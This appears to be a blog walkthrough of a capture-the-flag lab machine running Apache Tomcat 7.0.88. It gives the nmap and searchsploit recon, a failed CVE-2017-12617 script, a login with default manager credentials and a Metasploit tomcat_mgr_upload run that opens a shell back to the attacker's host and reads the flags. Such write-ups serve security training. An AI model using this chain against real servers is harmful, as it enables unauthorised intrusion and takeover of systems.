Fingerprinting
To begin, we need to gather some information about our target system. First, we set the target IP address as follows:
export ip=10.10.10.95
To determine the operating system, we perform a ping and observe the TTL value. In this case, the TTL is 127, which indicates that the target is likely running a Windows operating system.
nmap -Pn $ip
The scan reveals an open port 8080/tcp, which is running an Apache Tomcat server with the Coyote JSP engine version 1.1. We also obtain information about the HTTP server header, title, and favicon.
Vulnerability Discovery
To discover potential vulnerabilities specific to Apache Tomcat version 7.0.88, we employ the “searchsploit” tool:
searchsploit tomcat 7.0.88
The search results display two entries that appear relevant. Upon inspecting the files, we find a common CVE number, CVE-2017-12617, associated with both.
Exploiting CVE-2017-12617
Next, we proceed to exploit the identified vulnerability using a Python script available on GitHub:
git clone https://github.com/cyberheartmi9/CVE-2017-12617
python2 tomcat-cve-2017-12617.py -u http://$ip:8080
Unfortunately, the script reports that the target is not vulnerable to the CVE-2017-12617 exploit.
Exploring Alternative Exploits
Further research indicates that an alternative exploit exists for the Tomcat manager. By examining the landing page, we can see that the manager is active.
To gain access, we attempt to authenticate using guessed credentials. After a few failed attempts, the page returns a 403 error, which prompts us to follow the admin procedure for resetting the admin login. Additionally, the error provides example credentials:
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
We use the provided credentials to log in successfully, enabling us to proceed with the exploit.
Exploiting Tomcat Manager
To exploit the Tomcat manager vulnerability, we utilise the Metasploit Framework. First, we launch the Metasploit console:
msfconsole
Within the console, we load the appropriate exploit module:
use exploit/multi/http/tomcat_mgr_upload
We configure the required parameters for the exploit, such as the target IP address, port, our listening IP address, and the provided authentication credentials:
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.4
set HttpPassword s3cret
set HttpUsername tomcat
Finally, we execute the exploit:
run
Upon successful execution, we obtain a shell on the target system, granting us further control and access.
cd C:\\Users\\Administrator\\Desktop\\flags
cat 2\ for\ the\ price\ of\ 1.txt
The retrieved the user and root flags from the target system.
Conclusion
In this blog post, we demonstrated the process of identifying and exploiting a vulnerability in Apache Tomcat version 7.0.88. Although the initial CVE-2017-12617 exploit was unsuccessful, we discovered an alternative exploit through the Tomcat manager. By leveraging this exploit, we gained unauthorised access to the target system and retrieved valuable information.